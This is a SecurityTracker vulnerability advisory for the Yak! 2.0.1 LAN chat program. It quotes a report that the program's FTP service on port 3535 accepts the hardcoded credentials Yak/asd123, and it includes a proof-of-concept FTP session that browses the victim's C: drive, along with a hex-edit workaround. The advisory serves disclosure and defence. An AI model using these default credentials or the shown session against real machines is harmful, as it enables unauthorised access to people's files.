Yak! Chat Default Account Lets Remote Users Access the File System
|
|
SecurityTracker Alert ID: 1007694 |
|
SecurityTracker URL: http://securitytracker.com/id/1007694
|
|
CVE Reference:
GENERIC-MAP-NOMATCH
(Links to External Site)
|
Date: Sep 13 2003
|
Impact:
Disclosure of system information, Disclosure of user information, Modification of system information, Modification of user information
|
Exploit Included: Yes
|
Version(s): 2.0.1
|
Description:
A vulnerability was reported in the Yak! chat application. A remote user can access the file system.
It is reported that a remote user can access the application by connecting to TCP port 3535 and logging into the FTP service using a standard username ('Yak') and password ('asd123'). The remote user can thus gain access to the target user's file system.
|
Impact:
A remote user can gain access to the target user's file system.
|
Solution:
No solution was available at the time of this entry.
The author of the report indicates that you can edit the password by using a hexeditor on the application binary [see the Source Message for instructions].
|
Vendor URL: www.digicraft.com.au/yak/ (Links to External Site)
|
Cause:
Authentication error
|
Underlying OS:
Windows (Any)
|
|
Message History:
This archive entry has one or more follow-up message(s) listed below.
|
Source Message Contents
|
Date: 12 Sep 2003 09:06:23 -0000
Subject: Yak! 2.0.1 file trasfer exploit
|
http://www.digicraft.com.au/yak/
yak 2.0.1 is a software for chattin in lan environment for windows
it supports file transfers. the default port it listens is 3535.
connecting at 3535
telnet localhost 3535 gives up nice :
" 220 ICS FTP Server ready. "
meaning for file transfers ftp is being used. but the real pain starts when just by listening with a sniffer it was found ...
username : Yak
password : asd123
and logging in with this credentials gives almost full permission to the users' filesystem.
======================PoC========================
ftp> open localhost 3535
Connected to desktop.
220 ICS FTP Server ready.
User (desktop:(none)): Yak
331 Password required for Yak.
Password:
230 User Yak logged in.
ftp> dir
200 Port command successful.
150 Opening data connection for directory list.
C:\TEMP\*.* not found
226 File sent ok
ftp: 23 bytes received in 0.01Seconds 1.53Kbytes/sec.
ftp> cd ..
250 CWD command successful. "C:/" is current directory.
ftp> dir
200 Port command successful.
150 Opening data connection for directory list.
-rw-rw-rw- 1 ftp ftp 0 Aug 07 19:58 CONFIG.SYS
-rwxrwxrwx 1 ftp ftp 0 Aug 07 19:58 AUTOEXEC.BAT
drw-rw-rw- 1 ftp ftp 0 Sep 08 00:42 yak201
-r--r--r-- 1 ftp ftp 783764060 Sep 04 01:05 AVSEQ00.DAT
-r--r--r-- 1 ftp ftp 793687148 Sep 04 02:27 AVSEQ01.DAT
-rw-rw-rw- 1 ftp ftp 217 Sep 09 11:53 bil.reg
drw-rw-rw- 1 ftp ftp 0 Aug 07 21:03 Program Files
drw-rw-rw- 1 ftp ftp 0 Aug 09 01:39 test
drw-rw-rw- 1 ftp ftp 0 Aug 30 10:17 Norton AntiVirus
226 File sent ok
ftp: 594 bytes received in 0.00Seconds 594000.00Kbytes/sec.
ftp>
======================PoC========================
QUICK FIX :
-----------
with a hexeditor i found "asd123" <- the password
at offset :
A5B40
A5E81
changing the 6 char password to anything else like -> "asX12X" may
be a quick fix.
also the username changing should result the same.
|
|
